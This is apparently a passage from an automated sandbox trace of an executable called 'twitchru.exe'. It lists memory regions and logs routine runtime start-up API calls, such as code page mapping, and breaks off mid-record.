Region: id = 1057 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1058 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1059 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1060 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1061 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1062 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1063 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1064 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1065 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1066 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1067 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1068 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1069 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1070 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1071 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1178 start_va = 0x20a0000 end_va = 0x20dffff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1179 start_va = 0x2aa0000 end_va = 0x2b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002aa0000" filename = "" Region: id = 1180 start_va = 0x7feaa000 end_va = 0x7feacfff entry_point = 0x0 region_type = private name = "private_0x000000007feaa000" filename = "" Region: id = 1181 start_va = 0x73a90000 end_va = 0x73aa2fff entry_point = 0x73a90000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1182 start_va = 0x73a60000 end_va = 0x73a8efff entry_point = 0x73a60000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1183 start_va = 0x73a40000 end_va = 0x73a58fff entry_point = 0x73a40000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1184 start_va = 0x20e0000 end_va = 0x20e6fff entry_point = 0x0 region_type = private name = "private_0x00000000020e0000" filename = "" Region: id = 1185 start_va = 0x73a10000 end_va = 0x73a37fff entry_point = 0x73a10000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1186 start_va = 0x2ba0000 end_va = 0x2cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ba0000" filename = "" Region: id = 1187 start_va = 0x2ba0000 end_va = 0x2c22fff entry_point = 0x0 region_type = private name = "private_0x0000000002ba0000" filename = "" Region: id = 1188 start_va = 0x2ba0000 end_va = 0x2c27fff entry_point = 0x0 region_type = private name = "private_0x0000000002ba0000" filename = "" Region: id = 1189 start_va = 0x2ba0000 end_va = 0x2c2bfff entry_point = 0x0 region_type = private name = "private_0x0000000002ba0000" filename = "" Region: id = 1190 start_va = 0x2ba0000 end_va = 0x2c26fff entry_point = 0x0 region_type = private name = "private_0x0000000002ba0000" filename = "" Region: id = 1191 start_va = 0x2ba0000 end_va = 0x2c2efff entry_point = 0x0 region_type = private name = "private_0x0000000002ba0000" filename = "" Region: id = 1192 start_va = 0x21e0000 end_va = 0x221ffff entry_point = 0x0 region_type = private name = "private_0x00000000021e0000" filename = "" Region: id = 1193 start_va = 0x2ba0000 end_va = 0x2c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ba0000" filename = "" Region: id = 1194 start_va = 0x2ca0000 end_va = 0x2cdffff entry_point = 0x0 region_type = private name = "private_0x0000000002ca0000" filename = "" Region: id = 1195 start_va = 0x2ce0000 end_va = 0x2ddffff entry_point = 0x0 region_type = private name = "private_0x0000000002ce0000" filename = "" Region: id = 1196 start_va = 0x2de0000 end_va = 0x31dffff entry_point = 0x0 region_type = private name = "private_0x0000000002de0000" filename = "" Region: id = 1197 start_va = 0x7fea4000 end_va = 0x7fea6fff entry_point = 0x0 region_type = private name = "private_0x000000007fea4000" filename = "" Region: id = 1198 start_va = 0x7fea7000 end_va = 0x7fea9fff entry_point = 0x0 region_type = private name = "private_0x000000007fea7000" filename = "" Region: id = 1199 start_va = 0x490000 end_va = 0x490fff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 1200 start_va = 0x4a0000 end_va = 0x4a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 1201 start_va = 0x4a0000 end_va = 0x4adfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 1202 start_va = 0x4a0000 end_va = 0x4a5fff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 1203 start_va = 0x4b0000 end_va = 0x52cfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 1204 start_va = 0x4a0000 end_va = 0x4a0fff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 1205 start_va = 0x4b0000 end_va = 0x4b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 1206 start_va = 0x4a0000 end_va = 0x4a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 1207 start_va = 0x4b0000 end_va = 0x4b0fff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Thread: id = 27 os_tid = 0x3e4 [0219.158] GetStartupInfoA (in: lpStartupInfo=0x19ff18 | out: lpStartupInfo=0x19ff18*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0219.159] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76870000 [0219.159] GetProcAddress (hModule=0x76870000, lpProcName="FlsAlloc") returned 0x7688a330 [0219.160] GetProcAddress (hModule=0x76870000, lpProcName="FlsGetValue") returned 0x76887580 [0219.160] GetProcAddress (hModule=0x76870000, lpProcName="FlsSetValue") returned 0x76889910 [0219.160] GetProcAddress (hModule=0x76870000, lpProcName="FlsFree") returned 0x7688f400 [0219.160] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76870000 [0219.160] GetProcAddress (hModule=0x76870000, lpProcName="EncodePointer") returned 0x76fef190 [0219.164] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76870000 [0219.164] GetProcAddress (hModule=0x76870000, lpProcName="EncodePointer") returned 0x76fef190 [0219.165] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76870000 [0219.165] GetProcAddress (hModule=0x76870000, lpProcName="EncodePointer") returned 0x76fef190 [0219.165] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76870000 [0219.165] GetProcAddress (hModule=0x76870000, lpProcName="EncodePointer") returned 0x76fef190 [0219.165] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76870000 [0219.165] GetProcAddress (hModule=0x76870000, lpProcName="EncodePointer") returned 0x76fef190 [0219.166] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76870000 [0219.166] GetProcAddress (hModule=0x76870000, lpProcName="EncodePointer") returned 0x76fef190 [0219.166] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76870000 [0219.166] GetProcAddress (hModule=0x76870000, lpProcName="EncodePointer") returned 0x76fef190 [0219.167] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76870000 [0219.167] GetProcAddress (hModule=0x76870000, lpProcName="DecodePointer") returned 0x76fea200 [0219.167] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76870000 [0219.167] GetProcAddress (hModule=0x76870000, lpProcName="DecodePointer") returned 0x76fea200 [0219.167] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76870000 [0219.167] GetProcAddress (hModule=0x76870000, lpProcName="EncodePointer") returned 0x76fef190 [0219.168] GetProcAddress (hModule=0x76870000, lpProcName="DecodePointer") returned 0x76fea200 [0219.168] GetCurrentThreadId () returned 0x3e4 [0219.168] GetStartupInfoA (in: lpStartupInfo=0x19fe9c | out: lpStartupInfo=0x19fe9c*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0219.168] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0219.168] GetFileType (hFile=0x38) returned 0x2 [0219.168] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0219.168] GetFileType (hFile=0x3c) returned 0x2 [0219.168] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0219.168] GetFileType (hFile=0x40) returned 0x2 [0219.168] SetHandleCount (uNumber=0x20) returned 0x20 [0219.168] GetCommandLineA () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe\" " [0219.168] GetEnvironmentStringsW () returned 0x2ebe18* [0219.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1359, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1359 [0219.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1359, lpMultiByteStr=0x2110fd0, cbMultiByte=1359, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1359 [0219.169] FreeEnvironmentStringsW (penv=0x2ebe18) returned 1 [0219.169] GetLastError () returned 0x0 [0219.169] SetLastError (dwErrCode=0x0) [0219.169] GetLastError () returned 0x0 [0219.169] SetLastError (dwErrCode=0x0) [0219.169] GetLastError () returned 0x0 [0219.169] SetLastError (dwErrCode=0x0) [0219.169] GetACP () returned 0x4e4 [0219.170] GetLastError () returned 0x0 [0219.170] SetLastError (dwErrCode=0x0) [0219.170] IsValidCodePage (CodePage=0x4e4) returned 1 [0219.170] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fe7c | out: lpCPInfo=0x19fe7c) returned 1 [0219.170] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f948 | out: lpCPInfo=0x19f948) returned 1 [0219.170] GetLastError () returned 0x0 [0219.170] SetLastError (dwErrCode=0x0) [0219.170] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x19f8d8 | out: lpCharType=0x19f8d8) returned 1 [0219.170] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0219.170] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ역BĀ") returned 256 [0219.170] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ역BĀ", cchSrc=256, lpCharType=0x19f95c | out: lpCharType=0x19f95c) returned 1 [0219.170] GetLastError () returned 0x0 [0219.170] SetLastError (dwErrCode=0x0) [0219.170] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0219.170] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0219.170] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0219.170] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0219.170] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0219.170] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x19fc5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x46\xa3\xa3\x68\x94\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0219.170] GetLastError () returned 0x0 [0219.170] SetLastError (dwErrCode=0x0) [0219.170] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0219.170] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0219.170] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0219.171] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0219.171] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x19fb5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 